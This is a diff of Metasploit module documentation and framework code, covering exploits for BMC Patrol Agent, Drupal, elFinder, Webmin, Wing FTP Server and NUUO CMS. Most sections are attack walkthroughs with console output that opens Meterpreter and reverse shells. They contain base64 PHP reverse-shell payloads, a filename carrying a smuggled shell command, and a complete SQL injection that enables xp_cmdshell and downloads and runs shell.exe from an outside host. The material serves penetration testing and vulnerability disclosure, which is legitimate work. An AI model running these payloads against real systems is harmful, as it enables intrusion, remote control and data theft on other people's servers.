+[*] Meterpreter session 1 opened (192.168.1.2:8443 -> 192.168.1.2:58688) at 2019-03-15 18:57:24 -0500
+[*] Server stopped.
+[!] This exploit may require manual cleanup of '$HOME/.groovy/grapes/CarisaChristiansen' on the target
+
+meterpreter > getuid
+Server username: jenkins
+meterpreter > sysinfo
+Computer    : 6f21b8da2915
+OS          : Linux 4.9.93-linuxkit-aufs (amd64)
+Meterpreter : java/linux
+meterpreter >
+```
@@ -0,0 +1,94 @@
+## Description
+This module exploits the lack of proper authorization checks in the BMC Patrol Agent that allows arbitrary operating system commands to be executed at a higher privilege level than the user being authenticated. The module is simply a ruby implementation of the remote protocol provided by BMC Patrol Agent to execute system commands.
+
+The vulnerability was identified by Ryan Wincey of [Securifera](https://www.securifera.com/) and was assigned [CVE-2018-20735](https://www.cvedetails.com/cve/CVE-2018-20735/) Further details can be found at the [Securifera website](https://www.securifera.com/blog/2018/12/17/bmc-patrol-agent-domain-user-to-domain-admin/).
+
+
+## Vulnerable Application
+The module affects the BMC Patrol Agent component of [BMC TrueSight Infrastructure Management](https://docs.bmc.com/docs/TSInfrastructure/113/home-774795879.html). The agent is installed on servers managed using BMC TrueSight Infrastructure Management and listens on TCP port 3181. The vulnerability affects versions up to 11.3.
+
+## Verification Steps
+To use this exploit you will need access to BMC Patrol Agent.
+
+1. Install the BMC Patrol agent on a host.
+2. Ensure that the PatrolAgent service is running and listening on TCP port 3181.
+3. Launch `msfconsole`.
+4. Load the module `use exploit/multi/misc/bmc_patrol_cmd_exec`.
+5. Set the username to authenticate with `set USER patrol`.
+6. Set the password for the user `set PASSWORD password`.
+7. Set the command to execute `set CMD "whoami"`.
+8. Run the exploit `exploit`.
+
+The result should be that the string `nt authority\system` is returned and output.
+
+## Usage Scenarios
+The exploit module contains several targets as detailed below.
+
+### Target 0: Windows Powershell Injected Shellcode
+This module target provides support for command staging to enable arbitrary Metasploit payloads to be used against Windows targets (for example, a Meterpreter shell). 
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set payload windows/meterpreter/reverse_tcp
+	payload => windows/meterpreter/reverse_tcp
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] Sending stage (179779 bytes) to 192.168.162.133
+	[*] Meterpreter session 1 opened (192.168.162.128:4444 -> 192.168.162.133:58461) at 2019-02-10 23:00:03 -0500
+
+
+### Target 1: Generic Cmd
+This target can be used with *cmd* payloads to execute operating system commands against the target host.
+
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec 
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.130
+	RHOSTS => 192.168.162.130
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set LHOST 192.168.162.128
+	LHOST => 192.168.162.128
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER patrol
+	USER => patrol
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set TARGET 1
+	TARGET => 1
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PAYLOAD cmd/unix/reverse_netcat
+	PAYLOAD => cmd/unix/reverse_netcat
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit -j
+	[*] Exploit running as background job 0.
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > 
+	[*] Started reverse TCP handler on 192.168.162.128:4444 
+	[*] 192.168.162.130:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.130:3181 - Successfully authenticated user.
+	[*] Command shell session 1 opened (192.168.162.128:4444 -> 192.168.162.130:57408) at 2019-02-10 23:05:12 -0500
+
+
+### Target Cmd Execution: Windows/Unix/Linux
+This target isn't a formal target. It was added to allow a user to execute commands entirely through the Patrol Agent remote administration feature and view the output. It would be the most quiet of the targets as it does not create any additional connections or use powershell by default like Target 0.
+	
+	msf5 > use exploit/multi/misc/bmc_patrol_cmd_exec
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set RHOSTS 192.168.162.133
+	RHOSTS => 192.168.162.133
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set USER user
+	USER => user
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set PASSWORD password
+	PASSWORD => password
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > set CMD whoami
+	msf5 exploit(multi/misc/bmc_patrol_cmd_exec) > exploit
+	[*] 192.168.162.133:3181 - Connected to BMC Patrol Agent.
+	[*] 192.168.162.133:3181 - Successfully authenticated user.
+	[*] 192.168.162.133:3181 - Command to execute: whoami
+	[*] 192.168.162.133:3181 - Output:
+	nt authority\system
+
+
@@ -89,6 +89,7 @@ msf5 exploit(unix/webapp/drupal_drupalgeddon2) > check
 [*] Drupal 7 targeted at http://172.17.0.3/
 [+] Drupal appears unpatched in CHANGELOG.txt
 [*] Executing with printf(): sdHl4fLONOKfVZL1cEvXuJCuSkue
+[+] Drupal is vulnerable to code execution
 [+] 172.17.0.3:80 The target is vulnerable.
 msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run

@@ -96,6 +97,7 @@ msf5 exploit(unix/webapp/drupal_drupalgeddon2) > run
 [*] Drupal 7 targeted at http://172.17.0.3/
 [+] Drupal appears unpatched in CHANGELOG.txt
 [*] Executing with printf(): paAHBb9jyovEnLrrT5lMIB
+[+] Drupal is vulnerable to code execution
 [*] Executing with assert(): eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE3Mi4xNy4wLjEnOyAkcG9ydCA9IDQ0NDQ7IGlmICgoJGYgPSAnc3RyZWFtX3NvY2tldF9jbGllbnQnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigidGNwOi8veyRpcH06eyRwb3J0fSIpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnZnNvY2tvcGVuJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoJGlwLCAkcG9ydCk7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdzb2NrZXRfY3JlYXRlJykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoQUZfSU5FVCwgU09DS19TVFJFQU0sIFNPTF9UQ1ApOyAkcmVzID0gQHNvY2tldF9jb25uZWN0KCRzLCAkaXAsICRwb3J0KTsgaWYgKCEkcmVzKSB7IGRpZSgpOyB9ICRzX3R5cGUgPSAnc29ja2V0JzsgfSBpZiAoISRzX3R5cGUpIHsgZGllKCdubyBzb2NrZXQgZnVuY3MnKTsgfSBpZiAoISRzKSB7IGRpZSgnbm8gc29ja2V0Jyk7IH0gc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRsZW4gPSBmcmVhZCgkcywgNCk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkbGVuID0gc29ja2V0X3JlYWQoJHMsIDQpOyBicmVhazsgfSBpZiAoISRsZW4pIHsgZGllKCk7IH0gJGEgPSB1bnBhY2soIk5s.ZW4iLCAkbGVuKTsgJGxlbiA9ICRhWydsZW4nXTsgJGIgPSAnJzsgd2hpbGUgKHN0cmxlbigkYikgPCAkbGVuKSB7IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkYiAuPSBmcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRiIC49IHNvY2tldF9yZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgfSB9ICRHTE9CQUxTWydtc2dzb2NrJ10gPSAkczsgJEdMT0JBTFNbJ21zZ3NvY2tfdHlwZSddID0gJHNfdHlwZTsgaWYgKGV4dGVuc2lvbl9sb2FkZWQoJ3N1aG9zaW4nKSAmJiBpbmlfZ2V0KCdzdWhvc2luLmV4ZWN1dG9yLmRpc2FibGVfZXZhbCcpKSB7ICRzdWhvc2luX2J5cGFzcz1jcmVhdGVfZnVuY3Rpb24oJycsICRiKTsgJHN1aG9zaW5fYnlwYXNzKCk7IH0gZWxzZSB7IGV2YWwoJGIpOyB9IGRpZSgpOw));
 [*] Sending stage (37775 bytes) to 172.17.0.3
 [*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.3:46654) at 2018-04-24 23:25:17 -0500
@@ -0,0 +1,71 @@
+## Intro
+
+This module exploits a PHP `unserialize()` vulnerability in Drupal RESTful
+Web Services by sending a crafted request to the `/node` REST endpoint.
+
+As per [SA-CORE-2019-003], the initial remediation was to disable `POST`,
+`PATCH`, and `PUT`, but Ambionics [discovered] that `GET` was also vulnerable
+(albeit cached).
+
+Drupal updated [SA-CORE-2019-003] with [PSA-2019-02-22] to notify users of
+this alternate vector.
+
+[SA-CORE-2019-003]: https://www.drupal.org/sa-core-2019-003
+[PSA-2019-02-22]:   https://www.drupal.org/psa-2019-02-22
+[discovered]:       https://www.ambionics.io/blog/drupal8-rce
+
+Drupal < 8.5.11 and < 8.6.10 are vulnerable.
+
+## Setup
+
+`docker run -dp 80:80 drupal:8.6.9` and enable the HAL, HTTP Basic
+Authentication, RESTful Web Services, and Serialization modules at
+`/admin/modules`.
+
+Clear all caches at `/admin/config/development/performance` to repeat
+exploitation if targeted nodes are cached.
+
+## Targets
+
+```
+Id  Name
+--  ----
+0   PHP In-Memory
+1   Unix In-Memory
+```
+
+## Options
+
+**METHOD**
+
+Set this to the HTTP method to use. `POST` and `GET` (cached) are known
+to work.
+
+**NODE**
+
+Set this to a node ID on the target when using the `GET` method.
+
+## Usage
+
+```
+msf5 exploit(unix/webapp/drupal_restws_unserialize) > run
+
+[*] Started reverse TCP handler on 192.168.1.2:4444
+[*] Drupal 8 targeted at http://127.0.0.1/
+[!] CHANGELOG.txt no longer contains patch level
+[*] Executing with system(): echo 2oZashoKJTvVkPgkVLcTaehAdiv
+[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
+[+] Drupal is vulnerable to code execution
+[*] Executing with system(): php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMS4yJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNrKCJO.bGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
+[*] Sending POST to /node with link http://127.0.0.1/rest/type/shortcut/default
+[*] Sending stage (38247 bytes) to 192.168.1.2
+[*] Meterpreter session 1 opened (192.168.1.2:4444 -> 192.168.1.2:55653) at 2019-03-05 19:26:37 -0600
+
+meterpreter > getuid
+Server username: www-data (33)
+meterpreter > sysinfo
+Computer    : 11f5c33da9ec
+OS          : Linux 11f5c33da9ec 4.9.93-linuxkit-aufs #1 SMP Wed Jun 6 16:55:56 UTC 2018 x86_64
+Meterpreter : php/linux
+meterpreter >
+```
@@ -0,0 +1,90 @@
+## Description
+
+  This module exploits a command injection vulnerability in elFinder
+  versions prior to 2.1.48.
+
+  The PHP connector component allows unauthenticated users to upload
+  files and perform file modification operations, such as resizing and
+  rotation of an image. The file name of uploaded files is not validated,
+  allowing shell metacharacters.
+
+  When performing image operations on JPEG files, the filename is passed
+  to the `exiftran` utility without appropriate sanitization, causing
+  shell commands in the file name to be executed, resulting in remote
+  command injection as the web server user.
+
+  The PHP connector is not enabled by default.
+
+  The system must have `exiftran` installed and in `$PATH`.
+
+
+## Vulnerable Software
+
+  [elFinder](https://studio-42.github.io/elFinder/) is an open-source file
+  manager for web, written in JavaScript using jQuery and jQuery UI.
+
+  This module has been tested successfully on elFinder versions 2.1.47,
+  2.1.20 and 2.1.16 on Ubuntu.
+
+  Enable the PHP connector:
+
+  ```
+  mv php/connector.minimal.php-dist php/connector.minimal.php
+  ```
+
+  Install required `exiftran` utility:
+
+  ```
+  apt-get install exiftran
+  ```
+
+
+## Verification Steps
+
+  1. Start `msfconsole`
+  2. Do: `use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection`
+  3. Do: `set rhosts <IP>`
+  4. Do: `run`
+  5. You should get a new session
+
+## Options
+
+  **TARGETURI**
+
+  The base path to elFinder (default: `/elFinder/`)
+
+
+## Scenarios
+
+  ```
+  msf5 > use exploit/unix/webapp/elfinder_php_connector_exiftran_cmd_injection 
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set rhosts 172.16.191.253
+  rhosts => 172.16.191.253
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set targeturi /elFinder-2.1.47
+  targeturi => /elFinder-2.1.47
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > set verbose true
+  verbose => true
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > check
+  [*] 172.16.191.253:80 - The target service is running, but could not be validated.
+  msf5 exploit(unix/webapp/elfinder_php_connector_exiftran_cmd_injection) > run
+  
+  [*] Started reverse TCP handler on 172.16.191.165:4444 
+  [*] Uploading payload 'CDj7j1.jpg;echo 6370202e2e2f66696c65732f43446a376a312e6a70672a6563686f2a202e6b50555871684d5a2e706870 |xxd -r -p |sh& #.jpg' (1894 bytes)
+  [*] Triggering vulnerability via image rotation ...
+  [*] Executing payload (/elFinder-2.1.47/php/.kPUXqhMZ.php) ...
+  [*] Sending stage (38247 bytes) to 172.16.191.253
+  [*] Meterpreter session 1 opened (172.16.191.165:4444 -> 172.16.191.253:35564) at 2019-03-08 21:57:18 -0500
+  [!] Tried to delete .kPUXqhMZ.php, unknown result
+  [*] No reply
+  [*] Removing uploaded file ...
+  [+] Deleted uploaded file
+  
+  meterpreter > getuid
+  Server username: www-data (33)
+  meterpreter > sysinfo
+  Computer    : ubuntu
+  OS          : Linux ubuntu 4.15.0-20-generic #21-Ubuntu SMP Tue Apr 24 06:16:15 UTC 2018 x86_64
+  Meterpreter : php/linux
+  meterpreter > 
+  ```
+
@@ -0,0 +1,63 @@
+## Description
+
+This module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the 'Running Processes' (proc) privilege is set the user can accurately determine which directory to upload to. Webmin application files can be written/overwritten, which allows remote code execution. The module has been tested successfully with Webmin 1.900.
+
+## Vulnerable Application
+
+This module has been tested with [Webmin 1.900](https://sourceforge.net/projects/webadmin/files/webmin/1.900/)
+
+## Options
+
+**GUESSUPLOAD**
+
+Use default installation path `/usr/share/webmin/`
+
+## Verification Steps
+
+1. `use exploit/unix/webapp/webmin_upload_exec`
+2. `set rhosts <rhost>`
+3. `set username <username>`
+4. `set password <password>`
+5. `exploit`
+
+## Scenarios
+
+### Tested Webmin 1.900 on Ubuntu 18.04 x64
+
+```
+msf5 > use exploit/unix/webapp/webmin_upload_exec
+msf5 exploit(unix/webapp/webmin_upload_exec) > set rhosts 172.22.222.154
+rhosts => 172.22.222.154
+msf5 exploit(unix/webapp/webmin_upload_exec) > set username unixuser
+username => unixuser
+msf5 exploit(unix/webapp/webmin_upload_exec) > set password unixuser
+password => unixuser
+msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[+] Session cookie: 6215747dab393701e0acbb9ac5b7c699
+[*] Target URL => https://172.22.222.154:10000
+[*] Searching for directory to upload...
+[-] Failed to determine webmin share directory
+[-] Set GUESSUPLOAD to attempt upload to a default location
+[*] Exploit completed, but no session was created.
+msf5 exploit(unix/webapp/webmin_upload_exec) > set guessupload true
+guessupload => true
+msf5 exploit(unix/webapp/webmin_upload_exec) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[+] Session cookie: 46cbd354e4532fe55d1a462db128905c
+[*] Target URL => https://172.22.222.154:10000
+[*] Searching for directory to upload...
+[!] Could not determine upload directory. Using /usr/share/webmin/
+[+] File gxvgsiji.cgi was successfully uploaded.
+[*] Attempting to execute the payload...
+[*] Command shell session 1 opened (172.22.222.136:4444 -> 172.22.222.154:38960) at 2019-03-14 13:40:56 -0500
+[+] Deleted gxvgsiji.cgi
+
+uname -a 
+Linux ubuntu 4.18.0-16-generic #17~18.04.1-Ubuntu SMP Tue Feb 12 13:35:51 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
+whoami
+root
+exit
+```
@@ -0,0 +1,38 @@
+## Description ##
+
+This module exploits the embedded Lua interpreter in the admin web interface for versions 3.0.0 and above of Wing FTP Server. When supplying a specially crafted HTTP POST request an attacker can use os.execute() to execute arbitrary system commands on the target with SYSTEM privileges.
+
+Only versions of Wing FTP Server after 3.0.0 ship with the Lua interpreter and the admin web interface. This makes versions < 3.0.0 presumably NOT vulnerable to this exploit, simply due to the fact that they do not have the capability execute commands this way.
+
+Versions > 4.3.8 handle URL encoding differently compared to versions <= 4.3.8. Encoding the PowerShell payload with base64 allows it to work. CmdStager fails, however, as it cannot simply be base64 encoded like PowerShell. It is recommended to run `check` first before exploiting to get a feel for the vulnerable app. The module has a built-in check to detect `PowerShell` first before continuing with the exploit. It does so by calling `os.getenv()` to get environment variables, then searching for `PowerShell` case-insensitively. It will fall back to using `CmdStager` if `PowerShell` is absent and the version is <= 4.3.8.
+
+The full changelog for Wing FTP Server can be found at [https://www.wftpserver.com/serverhistory.htm].
+
+Information about the admin web interface can be found at [https://www.wftpserver.com/help/ftpserver/index.html?administrator_console.htm].
+
+## Vulnerable Application ##
+
+All versions of Wing FTP Server from 3.0.0 and up are presumed vulnerable.
+
+Upgraded module has been tested on a Windows Server 2019 Datacenter x64 with the following versions:
+
+- Wing FTP Server 4.3.8
+- Wing FTP Server 5.1.3
+- Wing FTP Server 6.0.1
+- Wing FTP Server 6.0.2
+- Wing FTP Server 6.0.3
+
+Original module was been tested on Windows 7 SP1 and Windows 8.1 with the following versions:
+
+- Wing FTP Server 4.3.6
+- Wing FTP Server 4.3.8
+
+## Verification Steps ##
+
+- [x] Start `msfconsole`
+- [x] `use exploit/windows/ftp/wing_ftp_admin_exec`
+- [x] `set RHOST <target-ip>`
+- [x] `set USERNAME <valid-username>`
+- [x] `set PASSWORD <valid-password>`
+- [x] `exploit`
+- [x] **Verify** that you get a shell
@@ -0,0 +1,93 @@
+## Description
+
+Nuuo CMS Authenticated SQL injection
+
+The GETOPENALARM verb is used to obtain information about alarms stored in the CMS Server database. An example request is below:
+
+```
+GETOPENALARM NUCM/1.0
+DeviceID: <number>
+SourceServer: <server-id>
+LastOne: <number>
+```
+
+The vulnerability is in the "SourceServer" parameter, which allows injection of arbitrary SQL characters, and can be abused to inject SQL into the executing statement. For example the following request:
+
+```
+GETOPENALARM NUCM/1.0
+DeviceID: 1
+SourceServer: ';drop table bobby;-- 
+LastOne: 3
+```
+
+Will cause the following SQL query to be executed on the server:
+SELECT AlarmNo, EventType, DeviceID, Channel, EventDesc, DateTime, PreviewImage, SourceServer, AlarmID, State, Priority, Owner, HistoryNo, PosTransaction, AlarmNote, AlarmType FROM AlarmLog WHERE DeviceID=1 AND SourceServer='';drop table bobby;-- ' AND State<20 order by DateTime DESC
+
+Given that SQL Server 2005 Express is used by default (see vulnerability #2), this can be abused to enable xp_cmdshell and achieve remote code execution.
+
+As as example, here is a full working exploit that downloads a reverse shell from http://10.0.99.102/shell.exe and executes it:
+
+```
+';exec sp_configure 'show advanced options', 1; reconfigure; exec sp_configure 'xp_cmdshell', 1; reconfigure; declare @q varchar(8000); select @q=0x78705f636d647368656c6c2027636420433a5c77696e646f77735c74656d705c202626206563686f202473746f726167654469723d24707764203e20776765742e707331202626206563686f2024776562636c69656e74203d204e65772d4f626a6563742053797374656d2e4e65742e576562436c69656e74203e3e20776765742e707331202626206563686f202475726c203d2022687474703a2f2f31302e302e39392e3130322f7368656c6c2e65786522203e3e20776765742e707331202626206563686f202466696c65203d20227368656c6c2e65786522203e3e20776765742e707331202626206563686f2024776562636c69656e742e446f776e6c6f616446696c65282475726c2c2466696c6529203e3e20776765742e70733120262620706f7765727368656c6c2e657865202d457865637574696f6e506f6c69637920427970617373202d4e6f4c6f676f202d4e6f6e496e746572616374697665202d4e6f50726f66696c65202d46696c6520776765742e70733120262620636d64202f6320433a5c77696e646f77735c74656d705c7368656c6c2e65786527; exec (@q);-- 
+```
+
+The encoded part of the exploit is the following:
+
+```
+xp_cmdshell 'cd C:\windows\temp\ && echo $storageDir=$pwd > wget.ps1 && echo $webclient = New-Object System.Net.WebClient >> wget.ps1 && echo $url = "http://10.0.99.102/shell.exe" >> wget.ps1 && echo $file = "shell.exe" >> wget.ps1 && echo $webclient.DownloadFile($url,$file) >> wget.ps1 && powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1 && cmd /c C:\windows\temp\shell.exe'
+```
+
+## Vulnerable Application
+
+[NUUO Central Management Server (CMS): all versions below 3.1](http://d1.nuuo.com/NUUO/CMS/)
+
+The following versions were tested:
+
+ - 1.5.2 OK
+ - 2.1.0 OK
+ - 2.3.2 OK
+ - 2.4.0 OK
+ - 2.6.0 OK
+ - 2.9.0 OK
+ - 2.10.0 OK
+
+## Scenarios
+
+### Tested on Windows 10 Pro x64 running NCS Server 2.4.0
+
+```
+msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set rhosts 172.22.222.200
+rhosts => 172.22.222.200
+msf5 exploit(windows/nuuo/nuuo_cms_sqli) > set srvhost 172.22.222.136
+srvhost => 172.22.222.136
+msf5 exploit(windows/nuuo/nuuo_cms_sqli) > exploit
+
+[*] Started reverse TCP handler on 172.22.222.136:4444 
+[*] 172.22.222.200:5180 - Starting up our web service on http://172.22.222.136:8080/YxAxhLwOUeKzH ...
+[*] 172.22.222.200:5180 - Using URL: http://172.22.222.136:8080/YxAxhLwOUeKzH
+[*] 172.22.222.200:5180 - Enabling xp_cmdshell and asking CMS to download and execute http://172.22.222.136:8080/YxAxhLwOUeKzH
+[*] 172.22.222.200:5180 - Injecting PowerShell payload
+[+] 172.22.222.200:5180 - Sending the payload to CMS...
+[*] 172.22.222.200:5180 - Executing shell...
+[*] Sending stage (179779 bytes) to 172.22.222.200
+[*] Meterpreter session 1 opened (172.22.222.136:4444 -> 172.22.222.200:49681) at 2019-02-19 06:15:35 -0600
+[*] 172.22.222.200:5180 - Server stopped.
+
+meterpreter > getuid
+Server username: NT Service\MSSQLSERVER
+meterpreter > sysinfo
+Computer        : DESKTOP-IPOGIJR
+OS              : Windows 10 (Build 17763).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/windows
+meterpreter >
+```
+
+## References
+
+https://ics-cert.us-cert.gov/advisories/ICSA-18-284-02
+
+https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-cms-ownage.txt
@@ -116,10 +116,22 @@ module Metasploit
              proof = ssh_socket.exec!("id\n").to_s
              if (proof =~ /id=/)
                proof << ssh_socket.exec!("uname -a\n").to_s
-                if (proof =~/JUNOS /)
+                if (proof =~ /JUNOS /)
                  # We're in the SSH shell for a Juniper JunOS, we can pull the version from the cli
                  # line 2 is hostname, 3 is model, 4 is the Base OS version
                  proof = ssh_socket.exec!("cli show version\n").split("\n")[2..4].join(", ").to_s
+                elsif (proof =~ /Linux USG /)
+                  # Ubiquiti Unifi USG
+                  proof << ssh_socket.exec!("cat /etc/version\n").to_s
+                end
+                temp_proof << ssh_socket.exec!("grep unifi.version /tmp/system.cfg\n").to_s
+                if (temp_proof =~ /unifi.version/)
+                  proof << temp_proof
+                  # Ubiquiti Unifi device (non-USG), possibly a switch.  Tested on US-24
+                  # The /tmp/*.cfg files don't give us device info, however the info command does
+                  # we dont call it originally since it doesnt say unifi/ubiquiti in it and info
+                  # is a linux command as well
+                  proof << ssh_socket.exec!("grep board.name /etc/board.info\n").to_s
                end
              else
                # Cisco IOS
@@ -151,6 +163,8 @@ module Metasploit

        def get_platform(proof)
          case proof
+          when /unifi\.version|UniFiSecurityGateway/ #Ubiquiti Unifi.  uname -a is left in, so we got to pull before Linux
+            'unifi'
          when /Linux/
            'linux'
          when /Darwin/
@@ -30,7 +30,7 @@ module Metasploit
        end
      end

-      VERSION = "4.17.42"
+      VERSION = "4.17.47"
      MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i }
      PRERELEASE = 'dev'
      HASH = get_hash
@@ -31,6 +31,11 @@ class CommandShell

  include Rex::Ui::Text::Resource

+  @@irb_opts = Rex::Parser::Arguments.new(
+    '-h' => [false, 'Help menu.'             ],
+    '-e' => [true,  'Expression to evaluate.']
+  )
+
  ##
  # :category: Msf::Session::Scriptable implementors
  #
@@ -99,19 +104,40 @@ class CommandShell
  #
  def commands
    {
-        'help'         =>  'Help menu',
-        'background'   => 'Backgrounds the current shell session',
-        'sessions'     => 'Quickly switch to another session',
-        'resource'     => 'Run a meta commands script stored in a local file',
-        'shell'        => 'Spawn an interactive shell (*NIX Only)',
-        'download'     => 'Download files (*NIX Only)',
-        'upload'       => 'Upload files (*NIX Only)',
-        'source'       => 'Run a shell script on remote machine (*NIX Only)',
+      'help'       => 'Help menu',
+      'background' => 'Backgrounds the current shell session',
+      'sessions'   => 'Quickly switch to another session',
+      'resource'   => 'Run a meta commands script stored in a local file',
+      'shell'      => 'Spawn an interactive shell (*NIX Only)',
+      'download'   => 'Download files (*NIX Only)',
+      'upload'     => 'Upload files (*NIX Only)',
+      'source'     => 'Run a shell script on remote machine (*NIX Only)',
+      'irb'        => 'Open an interactive Ruby shell on the current session',
+      'pry'        => 'Open the Pry debugger on the current session'
    }
  end

+  def cmd_help_help
+    print_line "There's only so much I can do"
+  end
+
  def cmd_help(*args)
+    cmd = args.shift
+
+    if cmd
+      unless commands.key?(cmd)
+        return print_error('No such command')
+      end
+
+      unless respond_to?("cmd_#{cmd}_help")
+        return print_error("No help for #{cmd}, try -h")
+      end
+
+      return send("cmd_#{cmd}_help")
+    end
+
    columns = ['Command', 'Description']
+
    tbl = Rex::Text::Table.new(
      'Header'  => 'Meta shell commands',
      'Prefix'  => "\n",
@@ -120,9 +146,11 @@ class CommandShell
      'Columns' => columns,
      'SortIndex' => -1
    )
+
    commands.each do |key, value|
      tbl << [key, value]
    end
+
    print(tbl.to_s)
  end

@@ -479,6 +507,76 @@ class CommandShell
